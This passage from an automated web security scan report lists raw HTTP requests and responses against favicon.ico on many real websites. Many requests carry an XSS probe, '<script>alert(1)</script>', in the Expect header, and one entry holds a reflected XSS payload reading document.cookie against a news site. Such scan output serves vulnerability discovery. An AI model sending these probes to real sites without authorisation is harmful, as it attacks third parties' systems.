Connection: Close
Content-Type: text/html

<div style="border: 3px solid #4991C5; font:1.5em; font-family:tahoma,calibri,arial; font-weight:bold; color:#1A4369; padding:5px; margin:10px; text-align:center"> The specified URL cannot be found.
...[SNIP]...

29.78. http://www.heraldpalladium.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.heraldpalladium.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.heraldpalladium.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Tue, 03 May 2011 10:34:30 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: heraldpalladium.com
Content-Length: 680
Connection: Keep-Alive
X-Cache-Info: cached

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

29.79. http://www.hijackthis.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hijackthis.de
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hijackthis.de
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Tue, 03 May 2011 11:05:25 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.67</center>
</body>
</html>

29.80. http://www.homefindingbook.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homefindingbook.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homefindingbook.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:41:33 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Content-Length: 2301
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...

29.81. http://www.hot-mom.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hot-mom.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hot-mom.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:44:20 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 482

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.
<HR>
<I>www.h
...[SNIP]...

29.82. http://www.hotmamamature.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hotmamamature.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hotmamamature.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

29.83. http://www.hotvintagetube.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hotvintagetube.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hotvintagetube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 03 May 2011 11:02:34 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.65</center>
</body>
</html>

29.84. http://www.hqgrannypics.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hqgrannypics.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hqgrannypics.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Tue, 03 May 2011 10:45:59 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>

29.85. http://www.hvacagent.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hvacagent.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hvacagent.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:56:08 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.86. http://www.hziegler.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hziegler.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hziegler.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.87. http://www.ibmsaudio.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ibmsaudio.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ibmsaudio.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:15:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 05 Apr 2009 21:52:36 GMT
ETag: "c628024-3bf-466d5ccbf5100"
Accept-Ranges: bytes
Content-Length: 959
Connection: close
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at ibmsaudio.com
</ADDRESS>
</BODY>
</HT
...[SNIP]...

29.88. http://www.ihiremanufacturing.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ihiremanufacturing.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ihiremanufacturing.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-SERVED-BY: 102
Date: Tue, 03 May 2011 10:32:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.89. http://www.ihireretail.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ihireretail.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ihireretail.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-SERVED-BY: 110
Date: Tue, 03 May 2011 10:54:53 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.90. http://www.ihop.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ihop.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ihop.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:36:28 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.91. http://www.islamfortoday.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.islamfortoday.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.islamfortoday.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:33:55 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:01:12 GMT
ETag: "169bb0d-4e4-486ced93a17fb"
Vary: Accept-Encoding
Content-Length: 1252
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>

   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

29.92. http://www.journalinquirer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.journalinquirer.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.journalinquirer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Tue, 03 May 2011 10:31:37 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: journalinquirer.com
Content-Length: 680
Connection: Keep-Alive
X-Cache-Info: cached

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

29.93. http://www.journalofaccountancy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.journalofaccountancy.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.journalofaccountancy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.94. http://www.jrward.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jrward.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jrward.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:55:32 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:01:12 GMT
ETag: "169bb0d-4e4-486ced93a17fb"
Vary: Accept-Encoding
Content-Length: 1252
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>

   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

29.95. http://www.kerbeck.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kerbeck.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kerbeck.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Tue, 03 May 2011 11:14:12 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 03 May 2011 11:14:12 GMT
Content-Type: text/html
Content-Length: 159

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>

29.96. http://www.kidk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kidk.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kidk.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:05:50 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Content-Length: 2290
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...

29.97. http://www.kuryakyn.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kuryakyn.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kuryakyn.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:19:29 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.98. http://www.latinspicebabes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.latinspicebabes.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.latinspicebabes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:18:27 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 490

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.
<HR>
<I>www.l
...[SNIP]...

29.99. http://www.linkblur.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linkblur.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.linkblur.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 12:23:48 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.100. http://www.little-tiny.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.little-tiny.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.little-tiny.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

29.101. http://www.louisvilleky.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.louisvilleky.gov
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.louisvilleky.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 140
Date: Tue, 03 May 2011 11:16:11 GMT
Content-Location: http://www.louisvilleky.gov/www.louisvilleky.gov/PageNotFound.html?404;http://www.louisvilleky.gov/favicon.ico
Content-Type: text/html
ETag: "401172bae437c61:db6"
Server: Microsoft-IIS/6.0
Last-Modified: Wed, 22 Feb 2006 19:18:14 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET

<html>
<head>
<meta http-equiv="refresh" content="1;url=http://www.louisvilleky.gov/PageNotFound.html">
</head>
<body>
</body>
</html>

29.102. http://www.lumens.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lumens.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lumens.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Powered-By: UniteU Ecommerce
Server: lighttpd/2.0.0
Content-Length: 103
Date: Tue, 03 May 2011 10:41:41 GMT
Connection: close

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

29.103. http://www.mailfinity.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mailfinity.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mailfinity.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:01:15 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:11:59 GMT
ETag: "d2e29bc8-4e4-486ceffc79be2"
Vary: Accept-Encoding
Content-Length: 1252
Accept-Ranges: bytes
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>

   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

29.104. http://www.maleindress.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maleindress.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maleindress.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Tue, 03 May 2011 10:44:44 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

29.105. http://www.manchesterairport.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manchesterairport.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manchesterairport.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

29.106. http://www.manga31.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manga31.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manga31.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.61
Date: Tue, 03 May 2011 10:41:28 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.61</center>
</body>
</html>

29.107. http://www.maturevideoclips.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maturevideoclips.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maturevideoclips.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 10:34:59 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Keep-Alive: timeout=20

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.108. http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/app/scripts/ajaxModules/'+upickemDeals[0][2]+'

Request

GET /app/scripts/ajaxModules/'+upickemDeals[0][2]+' HTTP/1.1
Host: www.maysville-online.com
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00c8fc6'%3balert(document.cookie)//110369244fe&regLink=true&title=&upickemSignup=&limit=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Tue, 03 May 2011 17:35:36 GMT
X-TN-ServedBy: cms.web.80
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: maysville-online.com
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 2085

<html>
<head>
<title>404: File Not Found</title>
<script language="javascript">

<!-- Hide from older browsers

// Print the name of the URL requested so it appears

...[SNIP]...

29.109. http://www.mdnr-elicense.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mdnr-elicense.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mdnr-elicense.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 11:02:36 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.110. http://www.meettheboss.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.meettheboss.tv
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.meettheboss.tv
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:53:06 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.111. http://www.megateengalls.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.megateengalls.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.megateengalls.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.39
Date: Tue, 03 May 2011 11:06:58 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.39</center>
</body>
</html>

29.112. http://www.mercadolivre.com.br/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mercadolivre.com.br
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mercadolivre.com.br
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat) DAV/2
Last-Modified: Tue, 14 Jun 2005 21:25:51 GMT
Cache-Control: max-age=360
Expires: Tue, 03 May 2011 10:16:35 GMT
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5174
Date: Tue, 03 May 2011 10:16:10 GMT
X-Varnish: 1651837267 1651792418
Age: 335
Connection: keep-alive
via: 1.1 Varnish (yblvarnish12)

..............h...&...00..............(....... ...........@.............................................................}......................vi.V3*......wz..:)...z..........~w......... ...Q.........
...[SNIP]...

29.113. http://www.mercagames.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mercagames.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mercagames.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Tue, 03 May 2011 15:43:38 GMT
Server: lighttpd

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.114. http://www.methodisthealth.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.methodisthealth.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.methodisthealth.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.115. http://www.million-movies.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.million-movies.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.million-movies.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.35
Date: Tue, 03 May 2011 10:15:12 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.35</center>
</body>
</html>

29.116. http://www.millionlooks.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millionlooks.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.millionlooks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 10:25:50 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
